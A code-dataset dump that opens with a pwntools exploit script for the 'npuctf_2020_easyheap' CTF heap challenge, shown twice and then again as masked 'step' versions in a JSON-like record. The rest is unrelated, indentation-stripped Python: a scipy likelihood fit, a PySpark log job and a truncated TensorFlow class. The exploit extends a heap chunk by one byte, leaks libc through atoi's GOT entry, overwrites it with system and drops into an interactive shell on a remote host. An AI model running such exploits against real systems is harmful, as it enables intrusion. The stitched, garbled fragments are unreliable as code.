def add(size, cont):
sh.sendlineafter('Your choice :', '1')
sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))
sh.sendlineafter('Content:', str(cont))
def edit(index, cont):
sh.sendlineafter('Your choice :', '2')
sh.sendlineafter('Index :', str(index))
sh.sendafter('Content: ', str(cont))
def delete(index):
sh.sendlineafter('Your choice :', '4')
sh.sendlineafter('Index :', str(index))
def show(index):
sh.sendlineafter('Your choice :', '3')
sh.sendlineafter('Index :', str(index))
def show_addr(name, addr):
log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))
sh = process('./npuctf_2020_easyheap')
sh = remote('node3.buuoj.cn', 27634)
add(24, 'A' * 8)
add(24, 'B' * 8)
edit(0, 'A' * 24 + 'A')
delete(1)
add(56, 'A' * 8)
payload = 'A' * 16 + p64(0) + p64(33)
payload += p64(56) + p64(elf.got['atoi'])
edit(1, payload)
show(1)
sh.recvuntil('Content : ')
libc_addr = u64(sh.recv(6).ljust(8, '\x00')) - libc.sym['atoi']
system_addr = libc_addr + libc.sym['system']
show_addr('libc_addr', libc_addr)
show_addr('system_addr', system_addr)
edit(1, p64(system_addr))
sh.interactive()
<|reserved_special_token_1|>
#+++++++++++++++++++exp.py++++++++++++++++++++
#!/usr/bin/python
# -*- coding:utf-8 -*-
#Author: Squarer
#Time: 2020.11.15 20.20.51
#+++++++++++++++++++exp.py++++++++++++++++++++
from pwn import*
#context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./npuctf_2020_easyheap')
libc = ELF('./libc-2.27.so')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
def add(size,cont):
sh.sendlineafter('Your choice :','1')
sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size))
sh.sendlineafter('Content:',str(cont))
def edit(index,cont):
sh.sendlineafter('Your choice :','2')
sh.sendlineafter('Index :',str(index))
sh.sendafter('Content: ',str(cont))
def delete(index):
sh.sendlineafter('Your choice :','4')
sh.sendlineafter('Index :',str(index))
def show(index):
sh.sendlineafter('Your choice :','3')
sh.sendlineafter('Index :',str(index))
def show_addr(name,addr):
log.success('The '+str(name)+' Addr:' + str(hex(addr)))
sh = process('./npuctf_2020_easyheap')
sh = remote('node3.buuoj.cn',27634)
#extending
add(0x18,'A'*8)
add(0x18,'B'*8)
edit(0,'A'*0x18+'\x41')
delete(1)
#leaking
add(0x38,'A'*8) #1
payload = 'A'*0x10 + p64(0) + p64(0x21)
payload += p64(0x38) + p64(elf.got['atoi'])
edit(1,payload)
show(1)
sh.recvuntil('Content : ')
libc_addr = u64(sh.recv(6).ljust(8,'\x00')) - libc.sym['atoi']
system_addr = libc_addr + libc.sym['system']
show_addr('libc_addr',libc_addr)
show_addr('system_addr',system_addr)
#hijacking
edit(1,p64(system_addr))
#gdb.attach(sh,'b*0x400E6D')
sh.interactive()
|
flexible
|
{
"blob_id": "eeedf4930a7fa58fd406a569db6281476c2e3e35",
"index": 4870,
"step-1": "<mask token>\n\n\ndef add(size, cont):\n sh.sendlineafter('Your choice :', '1')\n sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))\n sh.sendlineafter('Content:', str(cont))\n\n\ndef edit(index, cont):\n sh.sendlineafter('Your choice :', '2')\n sh.sendlineafter('Index :', str(index))\n sh.sendafter('Content: ', str(cont))\n\n\ndef delete(index):\n sh.sendlineafter('Your choice :', '4')\n sh.sendlineafter('Index :', str(index))\n\n\n<mask token>\n\n\ndef show_addr(name, addr):\n log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef add(size, cont):\n sh.sendlineafter('Your choice :', '1')\n sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))\n sh.sendlineafter('Content:', str(cont))\n\n\ndef edit(index, cont):\n sh.sendlineafter('Your choice :', '2')\n sh.sendlineafter('Index :', str(index))\n sh.sendafter('Content: ', str(cont))\n\n\ndef delete(index):\n sh.sendlineafter('Your choice :', '4')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show(index):\n sh.sendlineafter('Your choice :', '3')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show_addr(name, addr):\n log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))\n\n\n<mask token>\nadd(24, 'A' * 8)\nadd(24, 'B' * 8)\nedit(0, 'A' * 24 + 'A')\ndelete(1)\nadd(56, 'A' * 8)\n<mask token>\npayload += p64(56) + p64(elf.got['atoi'])\nedit(1, payload)\nshow(1)\nsh.recvuntil('Content : ')\n<mask token>\nshow_addr('libc_addr', libc_addr)\nshow_addr('system_addr', system_addr)\nedit(1, p64(system_addr))\nsh.interactive()\n",
"step-3": "<mask token>\ncontext.arch = 'amd64'\nelf = ELF('./npuctf_2020_easyheap')\nlibc = ELF('./libc-2.27.so')\n\n\ndef add(size, cont):\n sh.sendlineafter('Your choice :', '1')\n sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))\n sh.sendlineafter('Content:', str(cont))\n\n\ndef edit(index, cont):\n sh.sendlineafter('Your choice :', '2')\n sh.sendlineafter('Index :', str(index))\n sh.sendafter('Content: ', str(cont))\n\n\ndef delete(index):\n sh.sendlineafter('Your choice :', '4')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show(index):\n sh.sendlineafter('Your choice :', '3')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show_addr(name, addr):\n log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))\n\n\nsh = process('./npuctf_2020_easyheap')\nsh = remote('node3.buuoj.cn', 27634)\nadd(24, 'A' * 8)\nadd(24, 'B' * 8)\nedit(0, 'A' * 24 + 'A')\ndelete(1)\nadd(56, 'A' * 8)\npayload = 'A' * 16 + p64(0) + p64(33)\npayload += p64(56) + p64(elf.got['atoi'])\nedit(1, payload)\nshow(1)\nsh.recvuntil('Content : ')\nlibc_addr = u64(sh.recv(6).ljust(8, '\\x00')) - libc.sym['atoi']\nsystem_addr = libc_addr + libc.sym['system']\nshow_addr('libc_addr', libc_addr)\nshow_addr('system_addr', system_addr)\nedit(1, p64(system_addr))\nsh.interactive()\n",
"step-4": "from pwn import *\ncontext.arch = 'amd64'\nelf = ELF('./npuctf_2020_easyheap')\nlibc = ELF('./libc-2.27.so')\n\n\ndef add(size, cont):\n sh.sendlineafter('Your choice :', '1')\n sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))\n sh.sendlineafter('Content:', str(cont))\n\n\ndef edit(index, cont):\n sh.sendlineafter('Your choice :', '2')\n sh.sendlineafter('Index :', str(index))\n sh.sendafter('Content: ', str(cont))\n\n\ndef delete(index):\n sh.sendlineafter('Your choice :', '4')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show(index):\n sh.sendlineafter('Your choice :', '3')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show_addr(name, addr):\n log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))\n\n\nsh = process('./npuctf_2020_easyheap')\nsh = remote('node3.buuoj.cn', 27634)\nadd(24, 'A' * 8)\nadd(24, 'B' * 8)\nedit(0, 'A' * 24 + 'A')\ndelete(1)\nadd(56, 'A' * 8)\npayload = 'A' * 16 + p64(0) + p64(33)\npayload += p64(56) + p64(elf.got['atoi'])\nedit(1, payload)\nshow(1)\nsh.recvuntil('Content : ')\nlibc_addr = u64(sh.recv(6).ljust(8, '\\x00')) - libc.sym['atoi']\nsystem_addr = libc_addr + libc.sym['system']\nshow_addr('libc_addr', libc_addr)\nshow_addr('system_addr', system_addr)\nedit(1, p64(system_addr))\nsh.interactive()\n",
"step-5": "#+++++++++++++++++++exp.py++++++++++++++++++++\n#!/usr/bin/python\n# -*- coding:utf-8 -*- \n#Author: Squarer\n#Time: 2020.11.15 20.20.51\n#+++++++++++++++++++exp.py++++++++++++++++++++\nfrom pwn import*\n\n#context.log_level = 'debug'\ncontext.arch = 'amd64'\n\nelf = ELF('./npuctf_2020_easyheap')\nlibc = ELF('./libc-2.27.so')\n#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')\n#libc=ELF('/lib/i386-linux-gnu/libc.so.6')\n\ndef add(size,cont):\n\tsh.sendlineafter('Your choice :','1')\n\tsh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size))\n\tsh.sendlineafter('Content:',str(cont))\n\ndef edit(index,cont):\n\tsh.sendlineafter('Your choice :','2')\n\tsh.sendlineafter('Index :',str(index))\n\tsh.sendafter('Content: ',str(cont))\n\ndef delete(index):\n\tsh.sendlineafter('Your choice :','4')\n\tsh.sendlineafter('Index :',str(index))\n\ndef show(index):\n\tsh.sendlineafter('Your choice :','3')\n\tsh.sendlineafter('Index :',str(index))\n\ndef show_addr(name,addr):\n\tlog.success('The '+str(name)+' Addr:' + str(hex(addr)))\n\nsh = process('./npuctf_2020_easyheap')\nsh = remote('node3.buuoj.cn',27634)\n\n#extending\nadd(0x18,'A'*8)\nadd(0x18,'B'*8)\nedit(0,'A'*0x18+'\\x41')\ndelete(1)\n\n#leaking\nadd(0x38,'A'*8) #1\npayload = 'A'*0x10 + p64(0) + p64(0x21)\npayload += p64(0x38) + p64(elf.got['atoi'])\nedit(1,payload)\n\nshow(1)\nsh.recvuntil('Content : ')\nlibc_addr = u64(sh.recv(6).ljust(8,'\\x00')) - libc.sym['atoi']\nsystem_addr = libc_addr + libc.sym['system']\nshow_addr('libc_addr',libc_addr)\nshow_addr('system_addr',system_addr)\n\n#hijacking\nedit(1,p64(system_addr))\n#gdb.attach(sh,'b*0x400E6D')\n\nsh.interactive()\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
def f_1(x, a):
return 1 / (x + 5) * np.sin(a * x)
def f_2(x, a):
return np.sin(a * x) + 1
def f_3(x, a):
return np.sin(a * x ** 2)
<|reserved_special_token_0|>
def f_5(x):
return x * np.tan(x)
def f_6(x, a, b):
return (1 + a * x + b * x ** 2) / (2 / 3 * (b + 3))
<|reserved_special_token_0|>
def my_pdf(VAR, x):
a = VAR
pdf = f_1(x, a)
ln_pdf = np.log(pdf)
result = np.sum(-ln_pdf)
return result
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def f_1(x, a):
return 1 / (x + 5) * np.sin(a * x)
def f_2(x, a):
return np.sin(a * x) + 1
def f_3(x, a):
return np.sin(a * x ** 2)
def f_4(x, a):
return np.sin(a * x + 1) ** 2
def f_5(x):
return x * np.tan(x)
def f_6(x, a, b):
return (1 + a * x + b * x ** 2) / (2 / 3 * (b + 3))
def f_7(x, a, b):
return a + b * x
def f_8(x, a, b, c):
return np.sin(a * x) + c * np.exp(b * x) + 1
<|reserved_special_token_0|>
def my_pdf(VAR, x):
a = VAR
pdf = f_1(x, a)
ln_pdf = np.log(pdf)
result = np.sum(-ln_pdf)
return result
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def f_1(x, a):
return 1 / (x + 5) * np.sin(a * x)
def f_2(x, a):
return np.sin(a * x) + 1
def f_3(x, a):
return np.sin(a * x ** 2)
def f_4(x, a):
return np.sin(a * x + 1) ** 2
def f_5(x):
return x * np.tan(x)
def f_6(x, a, b):
return (1 + a * x + b * x ** 2) / (2 / 3 * (b + 3))
def f_7(x, a, b):
return a + b * x
def f_8(x, a, b, c):
return np.sin(a * x) + c * np.exp(b * x) + 1
def f_9(x, a, b):
return np.exp(-(x - a) ** 2 / (2 * b ** 2))
def my_pdf(VAR, x):
a = VAR
pdf = f_1(x, a)
ln_pdf = np.log(pdf)
result = np.sum(-ln_pdf)
return result
fname = 'Exam_2018_Prob1.txt'
data = np.loadtxt(fname)
z = data[:, 0]
a_bound = -10, 0
b_bound = -10, 10
c_bound = 4000, 8000
n_bound = 0, None
p_bound = 0, None
mu_bound = 0, None
data_0 = minimize(my_pdf, [1], args=z, method='SLSQP', bounds=(a_bound,))
print(data_0)
x = np.arange(20, 27, 0.01)
y = f_1(x, -3)
plt.plot(x, y + 0.2)
plt.hist(z, bins=200, normed=True)
plt.show()
binwidth = 0.1
n_bins = np.arange(min(data[:, 2]), max(data[:, 2]) + binwidth, binwidth)
<|reserved_special_token_1|>
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import minimize
from scipy.stats import chisquare, chi2, binom, poisson
def f_1(x, a):
return 1 / (x + 5) * np.sin(a * x)
def f_2(x, a):
return np.sin(a * x) + 1
def f_3(x, a):
return np.sin(a * x ** 2)
def f_4(x, a):
return np.sin(a * x + 1) ** 2
def f_5(x):
return x * np.tan(x)
def f_6(x, a, b):
return (1 + a * x + b * x ** 2) / (2 / 3 * (b + 3))
def f_7(x, a, b):
return a + b * x
def f_8(x, a, b, c):
return np.sin(a * x) + c * np.exp(b * x) + 1
def f_9(x, a, b):
return np.exp(-(x - a) ** 2 / (2 * b ** 2))
def my_pdf(VAR, x):
a = VAR
pdf = f_1(x, a)
ln_pdf = np.log(pdf)
result = np.sum(-ln_pdf)
return result
fname = 'Exam_2018_Prob1.txt'
data = np.loadtxt(fname)
z = data[:, 0]
a_bound = -10, 0
b_bound = -10, 10
c_bound = 4000, 8000
n_bound = 0, None
p_bound = 0, None
mu_bound = 0, None
data_0 = minimize(my_pdf, [1], args=z, method='SLSQP', bounds=(a_bound,))
print(data_0)
x = np.arange(20, 27, 0.01)
y = f_1(x, -3)
plt.plot(x, y + 0.2)
plt.hist(z, bins=200, normed=True)
plt.show()
binwidth = 0.1
n_bins = np.arange(min(data[:, 2]), max(data[:, 2]) + binwidth, binwidth)
<|reserved_special_token_1|>
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import minimize
from scipy.stats import chisquare, chi2, binom, poisson
def f_1(x, a):
return (1 / (x + 5)) * np.sin(a * x)
def f_2(x, a):
return np.sin(a * x) + 1
def f_3(x, a):
return np.sin(a * (x ** 2))
def f_4(x, a):
return np.sin(a * x + 1) ** 2
def f_5(x):
return x * np.tan(x)
def f_6(x, a, b):
return (1 + a * x + b * (x ** 2)) / ((2/3) * (b + 3))
def f_7(x, a, b):
return a + b * x
def f_8(x, a, b, c):
return np.sin(a * x) + c * np.exp(b * x) + 1
def f_9(x, a, b):
return np.exp(-(x - a) ** 2 / (2 * (b ** 2)))
def my_pdf(VAR, x):
a = VAR
pdf = f_1(x, a)
ln_pdf = np.log((pdf))
result = np.sum(-ln_pdf)
return result
fname = 'Exam_2018_Prob1.txt'
data = np.loadtxt(fname)
z = data[:, 0]
a_bound = (-10, 0)
b_bound = (-10, 10)
c_bound = (4000, 8000)
n_bound = (0, None)
p_bound = (0, None)
mu_bound = (0, None)
data_0 = minimize(my_pdf, [1, ], args=(z), method='SLSQP',
bounds=(a_bound, ))
print(data_0)
x = np.arange(20, 27, 0.01)
y = f_1(x, -3)
plt.plot(x, y+0.2)
plt.hist(z, bins=200, normed=True)
plt.show()
binwidth = 0.1
n_bins = np.arange(min(data[:, 2]), max(data[:, 2]) + binwidth, binwidth)
# Chi2 calculator
# observed_values, bins, _ = plt.hist(data[:, 2], bins=n_bins)
# plt.show()
# We normalize by multiplyting the length of the data with the binwidth
# expected_values = poisson.pmf(bins, data_0.x[0]) * len(data)
# print(observed_values[observed_values!=0])
# print(expected_values[expected_values!=0])
# print(chisquare(observed_values[observed_values!=0], f_exp=expected_values[expected_values!=0]))
# print('Threshold value ', chi2.isf(0.05, 18))
# x = np.arange(-1, 1, 0.01)
# y = f_6(x, data_0.x[0], data_0.x[1])
# plt.plot(x,y)
# plt.show()
|
flexible
|
{
"blob_id": "27edc753ebb9d60715a2ffa25d77e69ef363d010",
"index": 3568,
"step-1": "<mask token>\n\n\ndef f_1(x, a):\n return 1 / (x + 5) * np.sin(a * x)\n\n\ndef f_2(x, a):\n return np.sin(a * x) + 1\n\n\ndef f_3(x, a):\n return np.sin(a * x ** 2)\n\n\n<mask token>\n\n\ndef f_5(x):\n return x * np.tan(x)\n\n\ndef f_6(x, a, b):\n return (1 + a * x + b * x ** 2) / (2 / 3 * (b + 3))\n\n\n<mask token>\n\n\ndef my_pdf(VAR, x):\n a = VAR\n pdf = f_1(x, a)\n ln_pdf = np.log(pdf)\n result = np.sum(-ln_pdf)\n return result\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef f_1(x, a):\n return 1 / (x + 5) * np.sin(a * x)\n\n\ndef f_2(x, a):\n return np.sin(a * x) + 1\n\n\ndef f_3(x, a):\n return np.sin(a * x ** 2)\n\n\ndef f_4(x, a):\n return np.sin(a * x + 1) ** 2\n\n\ndef f_5(x):\n return x * np.tan(x)\n\n\ndef f_6(x, a, b):\n return (1 + a * x + b * x ** 2) / (2 / 3 * (b + 3))\n\n\ndef f_7(x, a, b):\n return a + b * x\n\n\ndef f_8(x, a, b, c):\n return np.sin(a * x) + c * np.exp(b * x) + 1\n\n\n<mask token>\n\n\ndef my_pdf(VAR, x):\n a = VAR\n pdf = f_1(x, a)\n ln_pdf = np.log(pdf)\n result = np.sum(-ln_pdf)\n return result\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef f_1(x, a):\n return 1 / (x + 5) * np.sin(a * x)\n\n\ndef f_2(x, a):\n return np.sin(a * x) + 1\n\n\ndef f_3(x, a):\n return np.sin(a * x ** 2)\n\n\ndef f_4(x, a):\n return np.sin(a * x + 1) ** 2\n\n\ndef f_5(x):\n return x * np.tan(x)\n\n\ndef f_6(x, a, b):\n return (1 + a * x + b * x ** 2) / (2 / 3 * (b + 3))\n\n\ndef f_7(x, a, b):\n return a + b * x\n\n\ndef f_8(x, a, b, c):\n return np.sin(a * x) + c * np.exp(b * x) + 1\n\n\ndef f_9(x, a, b):\n return np.exp(-(x - a) ** 2 / (2 * b ** 2))\n\n\ndef my_pdf(VAR, x):\n a = VAR\n pdf = f_1(x, a)\n ln_pdf = np.log(pdf)\n result = np.sum(-ln_pdf)\n return result\n\n\nfname = 'Exam_2018_Prob1.txt'\ndata = np.loadtxt(fname)\nz = data[:, 0]\na_bound = -10, 0\nb_bound = -10, 10\nc_bound = 4000, 8000\nn_bound = 0, None\np_bound = 0, None\nmu_bound = 0, None\ndata_0 = minimize(my_pdf, [1], args=z, method='SLSQP', bounds=(a_bound,))\nprint(data_0)\nx = np.arange(20, 27, 0.01)\ny = f_1(x, -3)\nplt.plot(x, y + 0.2)\nplt.hist(z, bins=200, normed=True)\nplt.show()\nbinwidth = 0.1\nn_bins = np.arange(min(data[:, 2]), max(data[:, 2]) + binwidth, binwidth)\n",
"step-4": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import minimize\nfrom scipy.stats import chisquare, chi2, binom, poisson\n\n\ndef f_1(x, a):\n return 1 / (x + 5) * np.sin(a * x)\n\n\ndef f_2(x, a):\n return np.sin(a * x) + 1\n\n\ndef f_3(x, a):\n return np.sin(a * x ** 2)\n\n\ndef f_4(x, a):\n return np.sin(a * x + 1) ** 2\n\n\ndef f_5(x):\n return x * np.tan(x)\n\n\ndef f_6(x, a, b):\n return (1 + a * x + b * x ** 2) / (2 / 3 * (b + 3))\n\n\ndef f_7(x, a, b):\n return a + b * x\n\n\ndef f_8(x, a, b, c):\n return np.sin(a * x) + c * np.exp(b * x) + 1\n\n\ndef f_9(x, a, b):\n return np.exp(-(x - a) ** 2 / (2 * b ** 2))\n\n\ndef my_pdf(VAR, x):\n a = VAR\n pdf = f_1(x, a)\n ln_pdf = np.log(pdf)\n result = np.sum(-ln_pdf)\n return result\n\n\nfname = 'Exam_2018_Prob1.txt'\ndata = np.loadtxt(fname)\nz = data[:, 0]\na_bound = -10, 0\nb_bound = -10, 10\nc_bound = 4000, 8000\nn_bound = 0, None\np_bound = 0, None\nmu_bound = 0, None\ndata_0 = minimize(my_pdf, [1], args=z, method='SLSQP', bounds=(a_bound,))\nprint(data_0)\nx = np.arange(20, 27, 0.01)\ny = f_1(x, -3)\nplt.plot(x, y + 0.2)\nplt.hist(z, bins=200, normed=True)\nplt.show()\nbinwidth = 0.1\nn_bins = np.arange(min(data[:, 2]), max(data[:, 2]) + binwidth, binwidth)\n",
"step-5": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import minimize\nfrom scipy.stats import chisquare, chi2, binom, poisson\n\n\ndef f_1(x, a):\n return (1 / (x + 5)) * np.sin(a * x)\n\n\ndef f_2(x, a):\n return np.sin(a * x) + 1\n\n\ndef f_3(x, a):\n return np.sin(a * (x ** 2))\n\n\ndef f_4(x, a):\n return np.sin(a * x + 1) ** 2\n\n\ndef f_5(x):\n return x * np.tan(x)\n\n\ndef f_6(x, a, b):\n return (1 + a * x + b * (x ** 2)) / ((2/3) * (b + 3)) \n\n\ndef f_7(x, a, b):\n return a + b * x\n\n\ndef f_8(x, a, b, c):\n return np.sin(a * x) + c * np.exp(b * x) + 1\n\n\ndef f_9(x, a, b):\n return np.exp(-(x - a) ** 2 / (2 * (b ** 2)))\n\ndef my_pdf(VAR, x):\n a = VAR\n\n pdf = f_1(x, a)\n\n ln_pdf = np.log((pdf))\n result = np.sum(-ln_pdf)\n return result\n\n\nfname = 'Exam_2018_Prob1.txt'\ndata = np.loadtxt(fname)\n\nz = data[:, 0]\n\na_bound = (-10, 0)\nb_bound = (-10, 10)\nc_bound = (4000, 8000)\n\nn_bound = (0, None)\np_bound = (0, None)\n\nmu_bound = (0, None)\n\ndata_0 = minimize(my_pdf, [1, ], args=(z), method='SLSQP',\n bounds=(a_bound, ))\n\n\nprint(data_0)\nx = np.arange(20, 27, 0.01)\ny = f_1(x, -3)\nplt.plot(x, y+0.2)\nplt.hist(z, bins=200, normed=True)\nplt.show()\nbinwidth = 0.1\nn_bins = np.arange(min(data[:, 2]), max(data[:, 2]) + binwidth, binwidth)\n\n# Chi2 calculator\n# observed_values, bins, _ = plt.hist(data[:, 2], bins=n_bins)\n\n# plt.show()\n# We normalize by multiplyting the length of the data with the binwidth\n# expected_values = poisson.pmf(bins, data_0.x[0]) * len(data) \n\n# print(observed_values[observed_values!=0])\n# print(expected_values[expected_values!=0])\n# print(chisquare(observed_values[observed_values!=0], f_exp=expected_values[expected_values!=0]))\n# print('Threshold value ', chi2.isf(0.05, 18))\n\n\n# x = np.arange(-1, 1, 0.01)\n# y = f_6(x, data_0.x[0], data_0.x[1]) \n# plt.plot(x,y)\n# plt.show()\n\n",
"step-ids": [
6,
9,
12,
13,
14
]
}
|
[
6,
9,
12,
13,
14
] |
from pyspark import SparkContext, SparkConf
conf = SparkConf().setAppName("same_host").setMaster("local")
sc = SparkContext(conf=conf)
julyFirstLogs = sc.textFile("/Users/iamsuman/src/iamsuman/myspark/mypyspark/data/nasa_19950701.tsv")
augFirstLogs = sc.textFile("/Users/iamsuman/src/iamsuman/myspark/mypyspark/data/nasa_19950801.tsv")
julyFirstLogs = julyFirstLogs.map(lambda line: line.split("\t")[0])
augFirstLogs = augFirstLogs.map(lambda line: line.split("\t")[0])
intersection = julyFirstLogs.intersection(augFirstLogs)
cleanedHostIntersection = intersection.filter(lambda host: host != "host")
cleanedHostIntersection.saveAsTextFile("out/nasa_logs_same_hosts.csv")
|
normal
|
{
"blob_id": "36fce3837e0341d94ff6099a06be8cf757a1cfa9",
"index": 3596,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ncleanedHostIntersection.saveAsTextFile('out/nasa_logs_same_hosts.csv')\n",
"step-3": "<mask token>\nconf = SparkConf().setAppName('same_host').setMaster('local')\nsc = SparkContext(conf=conf)\njulyFirstLogs = sc.textFile(\n '/Users/iamsuman/src/iamsuman/myspark/mypyspark/data/nasa_19950701.tsv')\naugFirstLogs = sc.textFile(\n '/Users/iamsuman/src/iamsuman/myspark/mypyspark/data/nasa_19950801.tsv')\njulyFirstLogs = julyFirstLogs.map(lambda line: line.split('\\t')[0])\naugFirstLogs = augFirstLogs.map(lambda line: line.split('\\t')[0])\nintersection = julyFirstLogs.intersection(augFirstLogs)\ncleanedHostIntersection = intersection.filter(lambda host: host != 'host')\ncleanedHostIntersection.saveAsTextFile('out/nasa_logs_same_hosts.csv')\n",
"step-4": "from pyspark import SparkContext, SparkConf\nconf = SparkConf().setAppName('same_host').setMaster('local')\nsc = SparkContext(conf=conf)\njulyFirstLogs = sc.textFile(\n '/Users/iamsuman/src/iamsuman/myspark/mypyspark/data/nasa_19950701.tsv')\naugFirstLogs = sc.textFile(\n '/Users/iamsuman/src/iamsuman/myspark/mypyspark/data/nasa_19950801.tsv')\njulyFirstLogs = julyFirstLogs.map(lambda line: line.split('\\t')[0])\naugFirstLogs = augFirstLogs.map(lambda line: line.split('\\t')[0])\nintersection = julyFirstLogs.intersection(augFirstLogs)\ncleanedHostIntersection = intersection.filter(lambda host: host != 'host')\ncleanedHostIntersection.saveAsTextFile('out/nasa_logs_same_hosts.csv')\n",
"step-5": "from pyspark import SparkContext, SparkConf\n\nconf = SparkConf().setAppName(\"same_host\").setMaster(\"local\")\nsc = SparkContext(conf=conf)\n\njulyFirstLogs = sc.textFile(\"/Users/iamsuman/src/iamsuman/myspark/mypyspark/data/nasa_19950701.tsv\")\naugFirstLogs = sc.textFile(\"/Users/iamsuman/src/iamsuman/myspark/mypyspark/data/nasa_19950801.tsv\")\n\n\njulyFirstLogs = julyFirstLogs.map(lambda line: line.split(\"\\t\")[0])\naugFirstLogs = augFirstLogs.map(lambda line: line.split(\"\\t\")[0])\n\nintersection = julyFirstLogs.intersection(augFirstLogs)\ncleanedHostIntersection = intersection.filter(lambda host: host != \"host\")\ncleanedHostIntersection.saveAsTextFile(\"out/nasa_logs_same_hosts.csv\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class TensorflowV1ModelStep(BaseTensorflowModelStep):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, create_graph, create_loss, create_optimizer,
create_feed_dict=None, data_inputs_dtype=None,
expected_outputs_dtype=None, variable_scope=None,
has_expected_outputs=True, print_loss=False, print_func=None):
BaseTensorflowModelStep.__init__(self, create_model=create_graph,
create_loss=create_loss, create_optimizer=create_optimizer,
create_inputs=create_feed_dict, data_inputs_dtype=
data_inputs_dtype, expected_outputs_dtype=
expected_outputs_dtype, step_saver=TensorflowV1StepSaver(),
print_loss=print_loss, print_func=print_func)
if variable_scope is None:
variable_scope = self.name
self.variable_scope = variable_scope
self.has_expected_outputs = has_expected_outputs
self.create_feed_dict = create_feed_dict
def setup(self, context: ExecutionContext) ->BaseStep:
"""
Setup tensorflow 1 graph, and session using a variable scope.
:return: self
:rtype: BaseStep
"""
if self.is_initialized:
return self
self.graph = tf.Graph()
with self.graph.as_default():
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
self.session = tf.Session(config=tf.ConfigProto(
log_device_placement=True), graph=self.graph)
model = self.create_model(self, context)
if not isinstance(model, tuple):
tf.identity(model, name='output')
else:
tf.identity(model[0], name='output')
tf.identity(model[1], name='inference_output')
tf.identity(self.create_loss(self), name='loss')
self.create_optimizer(self, context).minimize(self['loss'],
name='optimizer')
init = tf.global_variables_initializer()
self.session.run(init)
self.is_initialized = True
def teardown(self) ->BaseStep:
"""
Close session on teardown.
:return:
"""
if self.session is not None:
self.session.close()
self.is_initialized = False
return self
def strip(self):
"""
Strip tensorflow 1 properties from to step to make the step serializable.
:return: stripped step
:rtype: BaseStep
"""
self.graph = None
self.session = None
return self
<|reserved_special_token_0|>
def fit_model(self, data_inputs, expected_outputs=None) ->BaseStep:
"""
Fit tensorflow model using the variable scope.
:param data_inputs: data inputs
:param expected_outputs: expected outputs to fit on
:return: fitted self
:rtype: BaseStep
"""
feed_dict = {self['data_inputs']: data_inputs}
if self.has_expected_outputs:
feed_dict.update({self['expected_outputs']: expected_outputs})
if self.create_inputs is not None:
additional_feed_dict_arguments = self.create_inputs(self,
data_inputs, expected_outputs)
feed_dict.update(additional_feed_dict_arguments)
results = self.session.run([self['optimizer'], self['loss']],
feed_dict=feed_dict)
loss = results[1]
self.add_new_loss(loss)
return self
def transform(self, data_inputs, expected_outputs=None) ->'BaseStep':
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
return self.transform_model(data_inputs)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class TensorflowV1StepSaver(BaseSaver):
"""
Step saver for a tensorflow Session using tf.train.Saver().
It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.
.. seealso::
`Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,
:class:`~neuraxle.base.BaseSaver`
"""
def save_step(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext') ->'BaseStep':
"""
Save a step that is using tf.train.Saver().
:param step: step to save
:type step: BaseStep
:param context: execution context to save from
:type context: ExecutionContext
:return: saved step
"""
with step.graph.as_default():
saver = tf.train.Saver()
saver.save(step.session, self._get_saved_model_path(context, step))
step.strip()
return step
def load_step(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext') ->'BaseStep':
"""
Load a step that is using tensorflow using tf.train.Saver().
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
step.is_initialized = False
step.setup(context)
with step.graph.as_default():
saver = tf.train.Saver()
saver.restore(step.session, self._get_saved_model_path(context,
step))
return step
def can_load(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext'):
"""
Returns whether or not we can load.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
meta_exists = os.path.exists(os.path.join(context.get_path(),
'{0}.ckpt.meta'.format(step.get_name())))
index_exists = os.path.exists(os.path.join(context.get_path(),
